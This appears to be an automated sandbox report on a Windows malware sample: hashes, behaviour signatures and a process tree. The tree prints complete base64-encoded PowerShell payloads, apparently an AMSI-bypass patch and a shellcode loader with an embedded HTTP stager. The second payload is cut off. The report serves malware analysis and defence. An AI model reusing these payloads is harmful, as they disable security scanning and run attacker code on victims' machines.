fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036

Analysis

max time kernel
47s
max time network
53s
platform
windows7_x64
resource
win7-20220414-en
submitted
20-05-2022 03:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.exe
Size

84KB
MD5

c5ad0421f91222c171c271f87c6061f5
SHA1

519587e403dafb85f33f8490f64d6d6e6d035bb2
SHA256

fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036
SHA512

6e4bb50c2107965b2e0ab6defd7b78e808c1bf1a3b999f868c98e1ee20ca9c29687aa398b38a3ab37051dc1f570e995e7654208ad7cfe0e2af8d882e998f1010

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

1944 powershell.exe
1252 powershell.exe
1640 powershell.exe
1352 powershell.exe

pid	process
1944	powershell.exe
1252	powershell.exe
1640	powershell.exe
1352	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	1252	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	1352	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.execmd.exepowershell.exepowershell.execsc.exepowershell.exe

description	pid	process	target process
PID 632 wrote to memory of 1456	632	fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.exe	cmd.exe
PID 632 wrote to memory of 1456	632	fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.exe	cmd.exe
PID 632 wrote to memory of 1456	632	fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.exe	cmd.exe
PID 1456 wrote to memory of 1944	1456	cmd.exe	powershell.exe
PID 1456 wrote to memory of 1944	1456	cmd.exe	powershell.exe
PID 1456 wrote to memory of 1944	1456	cmd.exe	powershell.exe
PID 1944 wrote to memory of 1252	1944	powershell.exe	powershell.exe
PID 1944 wrote to memory of 1252	1944	powershell.exe	powershell.exe
PID 1944 wrote to memory of 1252	1944	powershell.exe	powershell.exe
PID 1252 wrote to memory of 2000	1252	powershell.exe	csc.exe
PID 1252 wrote to memory of 2000	1252	powershell.exe	csc.exe
PID 1252 wrote to memory of 2000	1252	powershell.exe	csc.exe
PID 2000 wrote to memory of 1716	2000	csc.exe	cvtres.exe
PID 2000 wrote to memory of 1716	2000	csc.exe	cvtres.exe
PID 2000 wrote to memory of 1716	2000	csc.exe	cvtres.exe
PID 1456 wrote to memory of 1640	1456	cmd.exe	powershell.exe
PID 1456 wrote to memory of 1640	1456	cmd.exe	powershell.exe
PID 1456 wrote to memory of 1640	1456	cmd.exe	powershell.exe
PID 1640 wrote to memory of 1352	1640	powershell.exe	powershell.exe
PID 1640 wrote to memory of 1352	1640	powershell.exe	powershell.exe
PID 1640 wrote to memory of 1352	1640	powershell.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.exe
"C:\Users\Admin\AppData\Local\Temp\fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:632

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\17D5.tmp\powershell_attack.bat" "C:\Users\Admin\AppData\Local\Temp\fb6e630be6338a0eddec9b6c000ae5e874f7e465b1d7385923939da803b17036.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:1456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /w 1 /C "sv rbE -;sv MeX ec;sv EZj ((gv rbE).value.toString()+(gv MeX).value.toString());powershell (gv EZj).value.toString() ('JABZAHgAUABkAEQAVwAgAD0AIABAACIACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABXAGkAbgAzADIAIAB7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAIgArACIAMgAiACsAIgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAoAEkAbgB0AFAAdAByACAAaABNAG8AZAB1AGwAZQAsACAAcwB0AHIAaQBuAGcAIABwAHIAbwBjAE4AYQBtAGUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAIgArACIAMgAiACsAIgAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAATABvAGEAZABMAGkAYgByAGEAcgB5ACgAcwB0AHIAaQBuAGcAIABuAGEAbQBlACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzACIAKwAiADIAIgArACIAIgApAF0AIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAVQBJAG4AdABQAHQAcgAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAE4AZQB3AFAAcgBvAHQAZQBjAHQALAAgAG8AdQB0ACAAdQBpAG4AdAAgAGwAcABmAGwATwBsAGQAUAByAG8AdABlAGMAdAApADsAfQAKACIAQAAKAEEAZABkAC0AVAB5AHAAZQAgACQAWQB4AFAAZABEAFcAOwAkAFgAdQB5AHYAdABIAGMAWgAgAD0AIABbAFcAaQBuADMAMgBdADoAOgBHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABbAFcAaQBuADMAMgBdADoAOgBMAG8AYQBkAEwAaQBiAHIAYQByAHkAKAAiAEEAbQBzACIAKwAiAGkAIgArACIALgAiACsAIgBkACIAKwAiAGwAbAAiACkALAAgACIAQQBtAHMAIgArACIAaQAiACsAIgBTACIAKwAiAGMAIgArACIAYQBuAEIAdQBmAGYAZQByACIAKQA7ACQAcABMAEMAYQBHAHUAcgAgAD0AIAAwADsAWwBXAGkAbgAzADIAXQA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABYAHUAeQB2AHQASABjAFoALAAgAFsAdQBpAG4AdAAzADIAXQA1ACwAIAAwAHgANAAwACwAIABbAHIAZQBmAF0AJABwAEwAQwBhAEcAdQByACkAOwAkAEwAeABoAG0AUQBrAHEAZQBNAEgAIAA9ACAAKAAiAH0AQgA4ACwAIAB9ADUANwAsACAAfQAwADAALAAgAH0AMAA3ACwAIAB9ADgAMAAsACAAfQBDADMAIgApAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIAAiADAAeAAiACkAOwAkAEwAeABoAG0AUQBrAHEAZQBNAEgAIAA9ACAAWwBCAHkAdABlAFsAXQBdACgAJABMAHgAaABtAFEAawBxAGUATQBIACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAQwBvAHAAeQAoACQATAB4AGgAbQBRAGsAcQBlAE0ASAAsACAAMAAsACAAJABYAHUAeQB2AHQASABjAFoALAAgADYAKQA=')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABZAHgAUABkAEQAVwAgAD0AIABAACIACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABXAGkAbgAzADIAIAB7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAIgArACIAMgAiACsAIgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAoAEkAbgB0AFAAdAByACAAaABNAG8AZAB1AGwAZQAsACAAcwB0AHIAaQBuAGcAIABwAHIAbwBjAE4AYQBtAGUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAIgArACIAMgAiACsAIgAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAATABvAGEAZABMAGkAYgByAGEAcgB5ACgAcwB0AHIAaQBuAGcAIABuAGEAbQBlACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzACIAKwAiADIAIgArACIAIgApAF0AIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAVQBJAG4AdABQAHQAcgAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAE4AZQB3AFAAcgBvAHQAZQBjAHQALAAgAG8AdQB0ACAAdQBpAG4AdAAgAGwAcABmAGwATwBsAGQAUAByAG8AdABlAGMAdAApADsAfQAKACIAQAAKAEEAZABkAC0AVAB5AHAAZQAgACQAWQB4AFAAZABEAFcAOwAkAFgAdQB5AHYAdABIAGMAWgAgAD0AIABbAFcAaQBuADMAMgBdADoAOgBHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABbAFcAaQBuADMAMgBdADoAOgBMAG8AYQBkAEwAaQBiAHIAYQByAHkAKAAiAEEAbQBzACIAKwAiAGkAIgArACIALgAiACsAIgBkACIAKwAiAGwAbAAiACkALAAgACIAQQBtAHMAIgArACIAaQAiACsAIgBTACIAKwAiAGMAIgArACIAYQBuAEIAdQBmAGYAZQByACIAKQA7ACQAcABMAEMAYQBHAHUAcgAgAD0AIAAwADsAWwBXAGkAbgAzADIAXQA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABYAHUAeQB2AHQASABjAFoALAAgAFsAdQBpAG4AdAAzADIAXQA1ACwAIAAwAHgANAAwACwAIABbAHIAZQBmAF0AJABwAEwAQwBhAEcAdQByACkAOwAkAEwAeABoAG0AUQBrAHEAZQBNAEgAIAA9ACAAKAAiAH0AQgA4ACwAIAB9ADUANwAsACAAfQAwADAALAAgAH0AMAA3ACwAIAB9ADgAMAAsACAAfQBDADMAIgApAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIAAiADAAeAAiACkAOwAkAEwAeABoAG0AUQBrAHEAZQBNAEgAIAA9ACAAWwBCAHkAdABlAFsAXQBdACgAJABMAHgAaABtAFEAawBxAGUATQBIACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAQwBvAHAAeQAoACQATAB4AGgAbQBRAGsAcQBlAE0ASAAsACAAMAAsACAAJABYAHUAeQB2AHQASABjAFoALAAgADYAKQA=
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1252

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0cxdhbk9.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3287.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3277.tmp"
6⤵
PID:1716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /w 1 /C "sv rbE -;sv MeX ec;sv EZj ((gv rbE).value.toString()+(gv MeX).value.toString());powershell (gv EZj).value.toString() ('JABOAGkAPQAnACQATABLAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAIgArACIAbgAiACsAIgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByACIAKwAiAG4AIgArACIAZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABpAEcAYQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAcwBjAD0AIgB9AGUAOAAsAH0AOAAyACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGMAMAAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMAAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQBhAGMALAB9ADMAYwAsAH0ANgAxACwAfQA3AGMALAB9ADAAMgAsAH0AMgBjACwAfQAyADAALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9ADAAMQAsAH0AYwA3ACwAfQBlADIALAB9AGYAMgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANABhACwAfQAzAGMALAB9ADgAYgAsAH0ANABjACwAfQAxADEALAB9ADcAOAAsAH0AZQAzACwAfQA0ADgALAB9ADAAMQAsAH0AZAAxACwAfQA1ADEALAB9ADgAYgAsAH0ANQA5ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADQAOQAsAH0AMQA4ACwAfQBlADMALAB9ADMAYQAsAH0ANAA5ACwAfQA4AGIALAB9ADMANAAsAH0AOABiACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBmAGYALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANgAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADQALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1AGYALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQBiACwAfQA4AGQALAB9ADUAZAAsAH0ANgA4ACwAfQA2AGUALAB9ADYANQAsAH0ANwA0ACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA2ADkALAB9ADYAZQAsAH0ANgA5ACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQBmAGYALAB9AGQANQAsAH0AMwAxACwAfQBkAGIALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQBlADgALAB9ADMAZQAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANABkACwAfQA2AGYALAB9ADcAYQAsAH0ANgA5ACwAfQA2AGMALAB9ADYAYwAsAH0ANgAxACwAfQAyAGYALAB9ADMANQAsAH0AMgBlACwAfQAzADAALAB9ADIAMAAsAH0AMgA4ACwAfQA1ADcALAB9ADYAOQAsAH0ANgBlACwAfQA2ADQALAB9ADYAZgAsAH0ANwA3ACwAfQA3ADMALAB9ADIAMAAsAH0ANABlACwAfQA1ADQALAB9ADIAMAAsAH0AMwA2ACwAfQAyAGUALAB9ADMAMQAsAH0AMwBiACwAfQAyADAALAB9ADUANAAsAH0ANwAyACwAfQA2ADkALAB9ADYANAAsAH0ANgA1ACwAfQA2AGUALAB9ADcANAAsAH0AMgBmACwAfQAzADcALAB9ADIAZQAsAH0AMwAwACwAfQAzAGIALAB9ADIAMAAsAH0ANwAyACwAfQA3ADYALAB9ADMAYQAsAH0AMwAxACwAfQAzADEALAB9ADIAZQAsAH0AMwAwACwAfQAyADkALAB9ADIAMAAsAH0ANgBjACwAfQA2ADkALAB9ADYAYgAsAH0ANgA1ACwAfQAyADAALAB9ADQANwAsAH0ANgA1ACwAfQA2ADMALAB9ADYAYgAsAH0ANgBmACwAfQAwADAALAB9ADYAOAAsAH0AMwBhACwAfQA1ADYALAB9ADcAOQAsAH0AYQA3ACwAfQBmAGYALAB9AGQANQAsAH0ANQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAzACwAfQA1ADMALAB9ADUAMwAsAH0ANgA4ACwAfQBiAGIALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9AGUAOAAsAH0ANQAxACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQAyAGYALAB9ADYAMgAsAH0ANgA3ACwAfQA1AGEALAB9ADUAMAAsAH0AMwAzACwAfQA1ADgALAB9ADMANQAsAH0ANQA1ACwAfQA0AGYALAB9ADYAZQAsAH0ANwA5ACwAfQ'+'A1ADAALAB9ADcAOQAsAH0AMwA0ACwAfQAzADcALAB9ADQAYgAsAH0AMwAwACwAfQA1ADQALAB9ADQAZAAsAH0ANQBhACwAfQA0AGMALAB9ADYANwAsAH0ANwAxACwAfQA0ADgALAB9ADYAMQAsAH0ANwAyACwAfQA3ADcALAB9ADMAMgAsAH0ANAA4ACwAfQA1ADYALAB9ADMAMQAsAH0ANABkACwAfQA2ADkALAB9ADMAOAAsAH0ANwA4ACwAfQAzADMALAB9ADUANwAsAH0ANAA4ACwAfQA1ADgALAB9ADcANgAsAH0ANwA1ACwAfQA2AGUALAB9ADUAMwAsAH0ANQA0ACwAfQA0ADcALAB9ADYAZAAsAH0ANQA4ACwAfQA2ADUALAB9ADUAZgAsAH0ANABlACwAfQA1ADQALAB9ADQAZAAsAH0ANQAwACwAfQA2ADIALAB9ADMANgAsAH0AMgBkACwAfQA0ADQALAB9ADYAZQAsAH0ANwBhACwAfQA3ADcALAB9ADUANAAsAH0ANAA2ACwAfQA2ADQALAB9ADUANQAsAH0ANgA3ACwAfQA1ADMALAB9ADQAMgAsAH0ANgBlACwAfQAzADIALAB9ADUANQAsAH0ANAA2ACwAfQA2AGEALAB9ADYAMQAsAH0ANgA1ACwAfQA3ADQALAB9ADMAMQAsAH0AMwAzACwAfQA3ADYALAB9ADQAYwAsAH0ANQAyACwAfQA0ADUALAB9ADcAMQAsAH0ANwAwACwAfQA1AGYALAB9ADUAMAAsAH0ANwA2ACwAfQA0ADgALAB9ADUAMwAsAH0AMwAzACwAfQA3AGEALAB9ADYAZQAsAH0ANAA1ACwAfQA3ADEALAB9ADYAMQAsAH0ANQBhACwAfQA0AGYALAB9ADYAOAAsAH0AMwAyACwAfQA0ADIALAB9ADQAMQAsAH0ANQAyACwAfQA3ADIALAB9ADcAMQAsAH0ANgA1ACwAfQAzADIALAB9ADcANAAsAH0ANQAzACwAfQA2ADUALAB9ADUAMgAsAH0AMwAwACwAfQAyAGQALAB9ADQANQAsAH0ANQA5ACwAfQA3ADEALAB9ADUANQAsAH0ANQA0ACwAfQA3ADEALAB9ADUANwAsAH0ANgA3ACwAfQA0ADgALAB9ADQANgAsAH0ANgAzACwAfQA1ADAALAB9ADcANQAsAH0ANAA0ACwAfQA0AGQALAB9ADQAZgAsAH0AMwAzACwAfQA0ADUALAB9ADYANAAsAH0ANABlACwAfQA0AGMALAB9ADIAZAAsAH0ANgAzACwAfQAzADUALAB9ADQANQAsAH0ANwA5ACwAfQAzADUALAB9ADcAOQAsAH0ANQAyACwAfQA1ADMALAB9ADMANAAsAH0ANgBjACwAfQA0ADgALAB9ADQAMwAsAH0ANwBhACwAfQA3ADMALAB9ADMAOQAsAH0ANQBhACwAfQA1ADgALAB9ADcAOQAsAH0ANAA5ACwAfQA3ADQALAB9ADQAYQAsAH0ANgA2ACwAfQA1ADkALAB9ADUANwAsAH0ANABkACwAfQA1ADYALAB9ADQAZQAsAH0ANQA0ACwAfQA3ADYALAB9ADYAMgAsAH0AMwA1ACwAfQAzADEALAB9ADYANwAsAH0ANgBhACwAfQA2ADkALAB9ADcANgAsAH0ANgA3ACwAfQA2ADIALAB9ADQANwAsAH0ANgA4ACwAfQA2AGEALAB9ADIAZAAsAH0ANAA1ACwAfQA3ADcALAB9ADMAOAAsAH0ANgA3ACwAfQA2AGMALAB9ADcANAAsAH0ANgBiACwAfQA3ADMALAB9ADQAZgAsAH0ANQA2ACwAfQA2AGMALAB9ADYAYQAsAH0ANABiACwAfQA2ADgALAB9ADcANAAsAH0AMwA3ACwAfQA3ADUALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADUANwAsAH0AOAA5ACwAfQA5AGYALAB9AGMANgAsAH0AZgBmACwAfQBkADUALAB9ADgAOQAsAH0AYwA2ACwAfQA1ADMALAB9ADYAOAAsAH0AMAAwACwAfQAzADIALAB9AGUAMAAsAH0AOAA0ACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADcALAB9ADUAMwAsAH0ANQA2ACwAfQA2ADgALAB9AGUAYgAsAH0ANQA1ACwAfQAyAGUALAB9ADMAYgAsAH0AZgBmACwAfQBkADUALAB9ADkANgAsAH0ANgBhACwAfQAwAGEALAB9ADUAZgAsAH0ANgA4ACwAfQA4ADAALAB9ADMAMwAsAH0AMAAwACwAfQAwADAALAB9ADgAOQAsAH0AZQAwACwAfQA2AGEALAB9ADAANAAsAH0ANQAwACwAfQA2AGEALAB9ADEAZgAsAH0ANQA2ACwAfQA2ADgALAB9ADcANQAsAH0ANAA2ACwAfQA5AGUALAB9ADgANgAsAH0AZgBmACwAfQBkADUALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQA2ACwAfQA2ADgALAB9ADIAZAAsAH0AMAA2ACwAfQAxADgALAB9ADcAYgAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADUALAB9ADEANAAsAH0ANgA4ACwAfQA4ADgALAB9ADEAMwAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0ANAA0ACwAfQBmADAALAB9ADMANQAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0ANABmACwAfQA3ADUALAB9AGMAZAAsAH0AZQA4ACwAfQA0AGEALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0ANAAwACwAfQA2ADgALAB9ADAAMAAsAH0AMQAwACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQAwADAALAB9ADAAMAAsAH0ANAAwACwAfQAwADAALAB9ADUAMwAsAH0ANgA4ACwAfQA1ADgALAB9AGEANAAsAH0ANQAzACwAfQBlADUALAB9AGYAZgAsAH0AZAA1ACwAfQA5ADMALAB9ADUAMwAsAH0ANQAzACwAfQA4ADkALAB9AGUANwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMAAsAH0AMgAwACwAfQAwADAALAB9ADAAMAAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AMQAyACwAfQA5ADYALAB9ADgAOQAsAH0AZQAyACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AYwBmACwAfQA4AGIALAB9ADAANwAsAH0AMAAxACwAfQBjADMALAB9ADgANQAsAH0AYwAwACwAfQA3ADUALAB9AGUANQAsAH0ANQA4ACwAfQBjADMALAB9ADUAZgAsAH0AZQA4ACwAfQA2AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADMAMQAsAH0AMwA2ACwAfQAzADcALAB9ADIAZQAsAH0AMwA5ACwAfQAzADkALAB9ADIAZQAsAH0AMwA3ACwAfQAzADMALAB9ADIAZQAsAH0AMwAxACwAfQAzADQALAB9ADMAMwAsAH0AMAAwACwAfQBiAGIALAB9AGYAMAAsAH0AYgA1ACwAfQBhADIALAB9ADUANgAsAH0ANgBhACwAfQAwADAALABADUAMwAsAH0AZgBmACwAfQBkADUAIgA7ACQAdgBOAD0AQQBkAGQALQBUAHkAcABlACAALQBwAGEAcwBzACAALQBtACAAJABMAEsAIAAtAE4AYQBtAGUAIAAiAFAARAAiACAALQBuAGEAbQBlAHMAIABzAGcATQA7ACQAdgBOAD0AJAB2AE4ALgByAGUAcABsAGEAYwBlACgAIgBzAGcATQAiACwAIAAiAFcAaQBuADMAMgBGAHUAIgArACIAbgAiACsAIgBjAHQAaQBvAG4AcwAiACkAOwBbAGIAeQB0AGUAWwBdAF0AJABzAGMAIAA9ACAAJABzAGMALgByAGUAcABsAGEAYwBlACgAIgB9ACIALAAiAHEAdwB3AHgAIgApAC4AcgBlAHAAbABhAGMAZQAoACIAcQB3AHcAIgAsACAAIgAwACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAE8ASQA9ADAAeAAxADAAMAAxADsAaQBmACAAKAAkAHMAYwAuAEwAIAAtAGcAdAAgADAAeAAxADAAMAAx'+'ACkAewAkAE8ASQA9ACQAcwBjAC4ATAB9ADsAJABHAEgAPQAkAHYATgA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADAAMQAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQAaQBHAGEAIAA9ACAAMAA7AGYAbwByACgAJABJAGoAPQAwADsAJABJAGoAIAAtAGwAZQAoACQAc